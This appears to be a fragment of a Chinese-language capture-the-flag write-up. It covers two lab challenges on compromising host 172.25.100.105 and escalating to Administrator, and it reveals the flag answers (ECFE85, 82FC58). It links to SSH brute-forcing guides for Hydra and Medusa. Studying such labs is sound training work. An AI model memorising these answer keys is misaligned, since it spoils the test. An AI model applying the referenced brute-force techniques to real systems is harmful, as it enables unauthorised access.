the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y
Password:
登入畫面:
找到userflag:
可以透過get-filehash來得到md5的值:
Challenge 39: (40 Points)
Compromise the 172.25.100.105 machine to gain user-level access. Locate userflag.txt and submit the last 6 hex digits of the md5 hash of the file.
Ans: ECFE85
如果登入kevin就可以拿到Adminflag:
同樣,md5:
Challenge 40: (60 Points)
Escalate your privilege to that of an Administrator in the 172.25.100.105 machine, locate adminflag.txt and submit the last 6 hex digits of the md5 hash of the file.
Ans: 82FC58
Reference
Medusa和Hydra快速入门手册:01
Bruteforce SSH using Hydra, Ncrack and Medusa – Kali Linux 2017 - Yeah Hub
Linux SSH密码暴力破解技术及攻防实战 - FreeBuf网络安全行业门户
![[Golang] Tags](https://www.coderbridge.com/@Chen840302/044ee4439eb744cb814d112e0944e45f?utm_source=coderbridge-io&utm_medium=blog_related_post_img&utm_campaign=little C Blog_[Golang] Tags_@Chen840302_https://static.coderbridge.com/images/covers/default-post-cover-3.jpg)
